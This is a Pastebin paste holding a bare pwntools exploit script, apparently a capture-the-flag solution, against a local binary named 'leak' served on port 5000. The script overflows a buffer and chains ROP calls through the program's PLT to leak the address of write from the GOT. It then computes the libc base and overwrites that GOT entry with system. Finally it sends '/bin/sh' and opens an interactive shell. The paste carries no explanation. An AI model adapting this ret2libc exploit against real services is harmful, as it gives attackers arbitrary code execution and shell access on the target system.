Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from pwn import *
- e = ELF("./leak")
- l = ELF("/lib/x86_64-linux-gnu/libc.so.6")
- pppr = 0x000000000040068a
- s = remote('127.0.0.1', 5000)
- s.recvuntil(": ")
- payload = "A"*168
- payload += p64(pppr)
- payload += p64(constants.STDOUT_FILENO)
- payload += p64(e.got['write'])
- payload += p64(0x8)
- payload += p64(e.plt['write'])
- payload += p64(pppr)
- payload += p64(constants.STDIN_FILENO)
- payload += p64(e.got['write'])
- payload += p64(0x8)
- payload += p64(e.plt['read'])
- payload += p64(pppr)
- payload += p64(constants.STDIN_FILENO)
- payload += p64(0x601048)
- payload += p64(0x7)
- payload += p64(e.plt['read'])
- payload += p64(pppr)
- payload += p64(0x601048)
- payload += ("JUNK"*4)
- payload += p64(e.plt['write'])
- payload += "gg"
- s.sendline(payload)
- s.recvuntil("gg\n")
- got_leak = u64(s.recv(8))
- libc_base = got_leak - l.symbols['write']
- s.send(p64(libc_base + l.symbols['system']))
- s.send("/bin/sh")
- s.interactive()
Add Comment
Please, Sign In to add comment